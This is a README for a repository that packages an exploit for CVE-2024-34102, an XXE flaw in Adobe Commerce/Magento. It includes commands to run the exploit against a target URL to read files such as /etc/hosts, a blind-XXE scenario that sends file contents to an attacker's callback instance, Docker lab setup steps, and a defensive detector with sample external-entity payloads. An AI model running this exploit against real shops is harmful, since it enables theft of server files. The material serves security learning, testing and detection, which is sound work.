EQSTLab/CVE-2024-34102

CVE-2024-34102

★ Thanks to @th3gokul, Sanjaith3hacker, Chocapikk for the original code base. ★

Description

CVE-2024-34102 (Adobe Commerce XXE vulnerability): Adobe Commerce versions 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 and earlier are affected by an Improper Restriction of XML External Entity Reference ('XXE') vulnerability that could result in arbitrary code execution. An attacker could exploit this vulnerability by sending a crafted XML document that references external entities. Exploitation of this issue does not require user interaction.

How to use

Git clone

git clone https://github.com/EQSTSeminar/CVE-2024-34102.git
cd CVE-2024-34102

Install packages

pip install -r requirements.txt

Command

python CVE-2024-34102.py -u <URL_TO_EXPLOIT> -f <FILE_TO_READ>

Example

python CVE-2024-34102.py https://magento.test -f /etc/hosts

Vulnerable Environment Based on Docker

Thanks to markshust's Docker Configuration for Magento, it isn't hard to build a vulnerable development environment. https://github.com/markshust/docker-magento

# Create your project directory then go into it:
mkdir /opt/magento
cd $_

# Install some stuff (needed for the script)
sudo apt update
sudo apt install -y bc curl

# Create Composer's directory (to avoid a weird error)
mkdir -p /var/www/.composer/

# Run this automated one-liner from the directory you want to install your project.
curl -s https://raw.githubusercontent.com/markshust/docker-magento/release/next/lib/onelinesetup | bash -s -- magento.test 2.4.7 community
# Submit credentials when needed.

# Edit hosts file (tee runs under sudo, so the append works for a non-root user)
echo "127.0.0.1 magento.test" | sudo tee -a /etc/hosts

PHPSTORM

You can debug your Magento instance using PhpStorm.

1. Enable Xdebug with the following command:

bin/xdebug enable

2. Then set up PhpStorm:

[Screenshot: PhpStorm debug configuration]

After that, you can debug your Magento instance.

Attack Scenario

Create callback URL (mocky api) -> Blind XXE attack (CVE-2024-34102) -> Send file contents to attacker's instance (SSRFUtility) -> Read the attacker's instance (SSRFUtility)
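
Seen from the defender's side, the second step of this scenario is a request body carrying a DTD that declares an external entity, and that can be flagged in captured request bodies. The following is an added example, not code from this repository: the sample bodies and the callback.example host are constructed, and it assumes bodies arrive either as raw XML or as JSON whose string values carry XML.

```python
import json
import re

# <!ENTITY [%] name SYSTEM "uri">  or  <!ENTITY [%] name PUBLIC "id" "uri">
EXTERNAL_ENTITY = re.compile(
    r"<!ENTITY\s+(?:%\s+)?[\w.:-]+\s+"
    r"(?:SYSTEM|PUBLIC\s+[\"'][^\"']*[\"'])\s+[\"']([^\"']*)[\"']",
    re.IGNORECASE)
DOCTYPE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)

# Constructed sample request bodies (not captured traffic).
SAMPLES = {
    "raw_xml": '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % x SYSTEM '
               '"http://callback.example/x.dtd"> %x;]><r/>',
    "json_escaped": r'{"data": {"xml": "\u003c!DOCTYPE r [\u003c!ENTITY % x '
                    r'SYSTEM \"http://callback.example/x.dtd\"> %x;]>"}}',
    "internal_only": '<!DOCTYPE n [<!ENTITY a "b">]><n>&a;</n>',
    "benign_json": '{"sku": "24-MB01", "qty": 1}',
}


def iter_strings(value):
    """Yield every string inside a decoded JSON value, at any depth."""
    if isinstance(value, str):
        yield value
    elif isinstance(value, (dict, list)):
        items = value.values() if isinstance(value, dict) else value
        for item in items:
            yield from iter_strings(item)


def inspect_body(body):
    """Report whether a body carries a DTD and which external URIs it names."""
    candidates = [body]
    try:
        # Decoding undoes \uXXXX and \" escapes that hide markup in raw JSON.
        candidates.extend(iter_strings(json.loads(body)))
    except ValueError:
        pass  # not JSON: only the raw body is inspected
    # Ordered de-duplication of every external entity target found.
    targets = list(dict.fromkeys(
        uri for text in candidates for uri in EXTERNAL_ENTITY.findall(text)))
    doctype = any(DOCTYPE.search(text) for text in candidates)
    return {"doctype": doctype, "external_targets": targets,
            "alert": bool(targets)}


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, inspect_body(body))
```

Matching request bodies this way is a detection aid for logs or a filtering proxy; the fix remains upgrading past the affected versions listed in the description.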

Disclaimer

This repository is not intended to be an XXE exploit for CVE-2024-34102. The purpose of this project is to help people learn about this vulnerability, and perhaps test their own applications.

EQST Insight

We publish CVE and malware analysis once a month. If you're interested, please follow the links below to check out our publications. https://www.skshieldus.com/eng/business/insight.do
